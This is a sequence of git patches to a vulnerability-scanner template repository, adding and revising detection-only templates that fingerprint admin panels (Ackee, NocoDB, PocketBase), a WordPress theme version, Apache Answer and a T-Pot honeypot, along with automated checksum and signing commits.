--- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3077,7 +3077,7 @@ http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b -http/cves/2023/CVE-2023-36347.yaml:25da245678a22835df7302ab8224f5c565c3ab05 +http/cves/2023/CVE-2023-36347.yaml:80107e418716ca04fb08977e478af1dde95045f3 http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672 http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259 http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef @@ -4098,6 +4098,7 @@ http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174 http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5 http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866 +http/exposed-panels/nocodb-panel.yaml:fc710750e2f1c75d3d5ad7992a82cdeb8f350187 http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814 http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3 http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8 @@ -8511,7 +8512,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:437f7d074cf075e18b475cce70f25038eff51a57 +templates-checksum.txt:72f641f0ebfaf1455ef3098a40debeda024c799e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f371df3c57db4156ce8b10e6f9f8dcc7e94200f3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 13:14:47 +0530 Subject: [PATCH 0861/1768] Update ackee-panel.yaml --- http/exposed-panels/ackee-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index a93921badc..92ea911dec 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -18,7 +18,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/favicon.ico" stop-at-first-match: true @@ -32,4 +32,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" From 13356f4a649c23bcc87e5a80b9500a2f7f771def Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:44:59 +0000 Subject: [PATCH 0862/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1334d4f766..d6acf5e0e2 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' From f4d05c2b99203350fd2a05a2b8b04b102ec0d467 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:46:01 +0000 Subject: [PATCH 0863/1768] Auto Template Signing [Mon May 13 07:46:01 UTC 2024] :robot: --- http/exposed-panels/nocodb-panel.yaml | 1 + http/exposed-panels/qlikview-accesspoint-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index 4b13399b47..14b35e026c 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -33,3 +33,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" +# digest: 4a0a004730450220714636130a5e204032c15b6e2559e50c5dc598f220ac85fdf5d0d0d98feec3ee022100836baf611ae336e0d9d107a9c9d3acd8c159804a0632983e87209fb0819e2790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index 73e33204f8..7fdb0a05d8 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -28,3 +28,4 @@ http: - 'status_code == 200' - 'contains_any(to_lower(body), "qlikview - accesspoint", "alt=\"qlikview")' condition: and +# digest: 4a0a00473045022100a06d783199cb65eae6682616e041f14ba523e0f4d1e74241c6dee95de224ef4b02201fdc28b5e00862150ebb7320d3188b6d7a41b2b7377c8aca554768b3d99c435a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0ea9d174b71cddd4e21a0b2dcf6209c8b8827a20 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 13:22:35 +0530 Subject: [PATCH 0864/1768] Update and rename wordpress-bricks-builder-theme-detect.yaml to http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml --- .../theme/wp-bricks-builder-theme.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) rename wordpress-bricks-builder-theme-detect.yaml => http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml (62%) diff --git a/wordpress-bricks-builder-theme-detect.yaml b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml similarity index 62% rename from wordpress-bricks-builder-theme-detect.yaml rename to http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml index ceba2ead00..f6c971b7ea 100644 --- a/wordpress-bricks-builder-theme-detect.yaml +++ b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml @@ -1,12 +1,14 @@ -id: wordpress-bricks-builder-theme-detect +id: wp-bricks-builder-theme + info: - name: Detect WordPress Bricks Builder Theme Version <= 1.9.6 - author: yourname + name: WordPress Bricks Builder Theme Version + author: Anonymous severity: info - description: Checks for Bricks Builder Theme versions 1.9.6 and below. + description: | + - Checks for Bricks Builder Theme versions. reference: - https://0day.today/exploit/description/39489 - tags: wordpress,bricksbuilder,detection + tags: wordpress,theme,wp-theme,wp,bricks requests: - method: GET @@ -16,15 +18,14 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "Bricks Builder" - part: body - type: regex + part: body regex: - "Version\\s([0-1]\\.[0-8]\\.\\d+|1\\.9\\.[0-6])" - part: body - condition: or - type: status status: From ae23c96b4f1aab028bfb74f73d57f24a76553fd5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 13:27:50 +0530 Subject: [PATCH 0865/1768] Update wp-bricks-builder-theme.yaml --- .../wordpress/theme/wp-bricks-builder-theme.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml index f6c971b7ea..04e889ae01 100644 --- a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml @@ -10,7 +10,7 @@ info: - https://0day.today/exploit/description/39489 tags: wordpress,theme,wp-theme,wp,bricks -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/themes/bricks/readme.txt" @@ -20,12 +20,12 @@ requests: - type: word part: body words: - - "Bricks Builder" + - "Bricks - Visual Website Builder" - type: regex part: body regex: - - "Version\\s([0-1]\\.[0-8]\\.\\d+|1\\.9\\.[0-6])" + - "Stable tag:([ 0-9.]+)" - type: status status: From da86003cb78818de2a1cd0728da3fd5550999004 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 13:28:30 +0530 Subject: [PATCH 0866/1768] Update wp-bricks-builder-theme.yaml --- .../technologies/wordpress/theme/wp-bricks-builder-theme.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml index 04e889ae01..adae776bda 100644 --- a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml @@ -8,6 +8,10 @@ info: - Checks for Bricks Builder Theme versions. reference: - https://0day.today/exploit/description/39489 + metadata: + publicwww-query: "/wp-content/themes/bricks/" + verified: true + max-request: 1 tags: wordpress,theme,wp-theme,wp,bricks http: From 91a329c9c69dc413d1f1dd56451a9b589f8f7131 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 11:35:41 +0330 Subject: [PATCH 0867/1768] Add pocketbase-panel.yaml --- http/exposed-panels/pocketbase-panel.yaml | 35 +++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/pocketbase-panel.yaml diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml new file mode 100644 index 0000000000..8fa30ab5be --- /dev/null +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -0,0 +1,35 @@ +id: pocketbase-panel + +info: + name: PocketBase Panel - Detect + author: userdehghani + severity: info + description: | + PocketBase Login panel was discovered. + reference: + - https://pocketbase.io/ + - https://pocketbase.io/docs/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:981081715 + tags: panel,nocodb,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/_/#/login" + - "{{BaseURL}}/_/images/favicon/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '<title>PocketBase' + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"981081715\" == mmh3(base64_py(body)))" \ No newline at end of file From a2a22a469aecd74c785ecb8f7f75cd68d1670d31 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 11:37:57 +0330 Subject: [PATCH 0868/1768] Update pocketbase-panel.yaml --- http/exposed-panels/pocketbase-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 8fa30ab5be..963b47a412 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:981081715 - tags: panel,nocodb,login,detect + tags: panel,pocketbase,login,detect http: - method: GET @@ -32,4 +32,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"981081715\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"981081715\" == mmh3(base64_py(body)))" From 0a786be1ed4fdb9cd99c5c4eb7bcca0bf148186d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 13:48:06 +0530 Subject: [PATCH 0869/1768] Update and rename apache-answer-version-detection-regex.yaml to http/technologies/apache/apache-answer-detect.yaml --- apache-answer-version-detection-regex.yaml | 28 ------------ .../apache/apache-answer-detect.yaml | 44 +++++++++++++++++++ 2 files changed, 44 insertions(+), 28 deletions(-) delete mode 100644 apache-answer-version-detection-regex.yaml create mode 100644 http/technologies/apache/apache-answer-detect.yaml diff --git a/apache-answer-version-detection-regex.yaml b/apache-answer-version-detection-regex.yaml deleted file mode 100644 index 85eceaa7ea..0000000000 --- a/apache-answer-version-detection-regex.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: apache-answer-version-detection-regex - -info: - name: Apache Answer Version Detection with Regex - author: Mohammad Reza Omrani | @omranisecurity - severity: info - description: Extracts the version of Apache Answer from the API endpoint using regex. - -requests: - - method: GET - path: - - "{{BaseURL}}/answer/api/v1/siteinfo/" - headers: - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 - Referer: "{{BaseURL}}/users/login" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - name: version - regex: - - '"version":"([^"]+)"' diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml new file mode 100644 index 0000000000..c9a4562f57 --- /dev/null +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -0,0 +1,44 @@ +id: apache-answer-detect + +info: + name: Apache Answer - Detection + author: omranisecurity + severity: info + description: | + Detects Apache Answer version through API endpoit + reference: + - https://answer.apache.org/ + metadata: + shodan-query: html:"Apache Answer" + fofa-query: body="Apache Answer" + verified: true + max-request: 1 + tags: detect,tech,apache + +http: + - method: GET + path: + - "{{BaseURL}}/answer/api/v1/siteinfo" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"code":' + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: version + regex: + - '"version":"([^"]+)"' From 9bf8ab40aab23d9163298b0e169d59890c5cdcde Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 13 May 2024 13:48:57 +0530 Subject: [PATCH 0870/1768] updated matchers --- http/exposed-panels/ackee-panel.yaml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index 92ea911dec..d34adeec05 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -11,7 +11,7 @@ info: - https://docs.ackee.electerious.com/ metadata: verified: true - max-request: 1 + max-request: 2 shodan-query: http.favicon.hash:-1495233116 tags: panel,ackee,login,detect @@ -22,14 +22,9 @@ http: - "{{BaseURL}}/favicon.ico" stop-at-first-match: true - matchers-condition: or matchers: - - type: word - part: body - words: - - '<title>Ackee' - case-insensitive: true - - type: dsl dsl: + - 'status_code==200 && contains(tolower(body), "<title>ackee")' - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" + condition: or From 15bcf5caaed21630ca621742f98eb1274beea617 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:22:52 +0000 Subject: [PATCH 0871/1768] Auto Generated New Template Addition List [Mon May 13 08:22:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9883216bfc..63780ce4a5 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml +http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml From 6b2f20f648b12f06fcf0298495ec442b72145ade Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:22:55 +0000 Subject: [PATCH 0872/1768] Auto Generated Templates Checksum [Mon May 13 08:22:55 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1a57ba8249..b110c746ae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3484,6 +3484,7 @@ http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cc http/exposed-panels/acemanager-login.yaml:0197d85b74ad6a243f7722048e36b0fcd64f9862 http/exposed-panels/acenet-panel.yaml:b88e1211a38547cc9d8ee15228197eb2d9512430 http/exposed-panels/achecker-panel.yaml:5c7e9d3946502e0f479d98cb9a3ba27b2e5a9a9c +http/exposed-panels/ackee-panel.yaml:2e660b70c0043f4ff3630b1ea2bc757c8099d06b http/exposed-panels/acrolinx-dashboard.yaml:2238288d59b3af798ae446173975a84abb7dfcea http/exposed-panels/acti-panel.yaml:628420846539ed0cf69e5689f49ab4e57a26a451 http/exposed-panels/active-admin-exposure.yaml:504071b3c78140c2d6866df302226fe9f7bdd733 @@ -4098,7 +4099,7 @@ http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174 http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5 http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866 -http/exposed-panels/nocodb-panel.yaml:fc710750e2f1c75d3d5ad7992a82cdeb8f350187 +http/exposed-panels/nocodb-panel.yaml:0519137744c936f9cff62dcf92e8b5885a9fef04 http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814 http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3 http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8 @@ -4234,7 +4235,7 @@ http/exposed-panels/pypicloud-panel.yaml:a8e13404f2ea40b2acaad8749a8c69b862e3b5e http/exposed-panels/qBittorrent-panel.yaml:0b49b83c08748b4b91db7e36fb06518a6d08ec88 http/exposed-panels/qdpm-login-panel.yaml:8f5b3e24b7156ab64d0d391ae05c299118ced753 http/exposed-panels/qlik-sense-server.yaml:4db84c0d1e3d5c1cfab2307ce8711291a039c6da -http/exposed-panels/qlikview-accesspoint-panel.yaml:6d6bd76d548c8b60544fdb95b3e8ea9ac7fefd18 +http/exposed-panels/qlikview-accesspoint-panel.yaml:cd944a5ea2366ac3dc76a3b95ad122a496f77738 http/exposed-panels/qmail-admin-login.yaml:4ba2c84becd76232e9b799bbc3433797e3d5a1f4 http/exposed-panels/qnap/qnap-photostation-panel.yaml:c7692c948143c7affd3ec7447e5038fe3ab23c6d http/exposed-panels/qnap/qnap-qts-panel.yaml:4939e5e7c6952bee595287b84575fad48db6435a @@ -8512,7 +8513,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:72f641f0ebfaf1455ef3098a40debeda024c799e +templates-checksum.txt:f801ac1e3065b02cb1c91d763ddae8019328bf37 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d33d8dfdd2a494eb58fbac8726f3112e0887dff4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:23:49 +0000 Subject: [PATCH 0873/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d6acf5e0e2..9517d028d3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' From 765989482b14067098a2abf2ac7be7d2c502e137 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:24:43 +0000 Subject: [PATCH 0874/1768] Auto Template Signing [Mon May 13 08:24:43 UTC 2024] :robot: --- http/exposed-panels/ackee-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml index d34adeec05..4a56df4878 100644 --- a/http/exposed-panels/ackee-panel.yaml +++ b/http/exposed-panels/ackee-panel.yaml @@ -28,3 +28,4 @@ http: - 'status_code==200 && contains(tolower(body), "<title>ackee")' - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" condition: or +# digest: 4b0a004830460221008f061832211cdc60b4f105a9623e07e810e376ebd87114c6c5d1a44384f7a50d022100e0170bd8a83aeb161c606e362f8752d638435fca57bf17b2b09f76dd7caa9350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 21837080a15bbd700d91e17513c9b72369f75a27 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 14:07:08 +0530 Subject: [PATCH 0875/1768] minor update --- http/honeypot/tpot-honeypot-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index 43470e4fa6..a999be727a 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -1,7 +1,7 @@ id: tpot-honeypot-detect info: - name: tpot Honeypot - Detect + name: T-Pot Honeypot - Detect author: rxerium severity: info description: | @@ -13,7 +13,7 @@ info: http: - method: GET path: - - "{{BaseURL}}:64297" + - "{{BaseURL}}" matchers-condition: and matchers: @@ -27,4 +27,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From 583b3c5a972a1588318d968ec2272bd9b88352e7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:40:57 +0000 Subject: [PATCH 0876/1768] Auto Generated New Template Addition List [Mon May 13 08:40:57 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 63780ce4a5..e39e76e6d8 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/exposed-panels/craftercms-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml +http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml From 20488788c7348a5d67625ed2c1bd9dcb61d2f409 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:41:41 +0000 Subject: [PATCH 0877/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9517d028d3..05cd350984 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' + - 'http/honeypot/tpot-honeypot-detect.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' From 24a5456b82afe21ab3145b4de48946a099f4d1ee Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:42:15 +0000 Subject: [PATCH 0879/1768] Auto Generated Templates Checksum [Mon May 13 08:42:15 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b110c746ae..6bf43d12bd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3484,7 +3484,7 @@ http/exposed-panels/3g-wireless-gateway.yaml:5144fcfd72ba87d6c10623148d468f3d0cc http/exposed-panels/acemanager-login.yaml:0197d85b74ad6a243f7722048e36b0fcd64f9862 http/exposed-panels/acenet-panel.yaml:b88e1211a38547cc9d8ee15228197eb2d9512430 http/exposed-panels/achecker-panel.yaml:5c7e9d3946502e0f479d98cb9a3ba27b2e5a9a9c -http/exposed-panels/ackee-panel.yaml:2e660b70c0043f4ff3630b1ea2bc757c8099d06b +http/exposed-panels/ackee-panel.yaml:fc048c64a3be4b70abcbbdab43592287f34db03d http/exposed-panels/acrolinx-dashboard.yaml:2238288d59b3af798ae446173975a84abb7dfcea http/exposed-panels/acti-panel.yaml:628420846539ed0cf69e5689f49ab4e57a26a451 http/exposed-panels/active-admin-exposure.yaml:504071b3c78140c2d6866df302226fe9f7bdd733 @@ -5083,6 +5083,7 @@ http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbb http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa http/honeypot/snare-honeypot-detect.yaml:b63d27a24618602947f861b69eec3ceee8c08bd5 +http/honeypot/tpot-honeypot-detect.yaml:05ed4e7cc965374521c470e85244357e7393df96 http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117 http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19 @@ -5509,7 +5510,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3 http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d -http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:017a97227ca466c4831450986e59a3c99ea1f781 +http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:b9cb06e3e9760001311c8864648243fcf1bec38b http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef @@ -8513,7 +8514,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f801ac1e3065b02cb1c91d763ddae8019328bf37 +templates-checksum.txt:23b1af453d65469d014b1b27b0f441f2048fa275 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1e81084409434be9a93ff2f3d94e92f9c70ab36d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 14:12:20 +0530 Subject: [PATCH 0880/1768] Update and rename wp-bricks-builder-theme.yaml to wp-bricks-builder-theme.yaml --- .../wordpress/{theme => themes}/wp-bricks-builder-theme.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/technologies/wordpress/{theme => themes}/wp-bricks-builder-theme.yaml (100%) diff --git a/http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml similarity index 100% rename from http/technologies/wordpress/theme/wp-bricks-builder-theme.yaml rename to http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml From 387b61a2673435ff653fbe2ef9f8e1643262d1d5 Mon Sep 17 00:00:00 2001 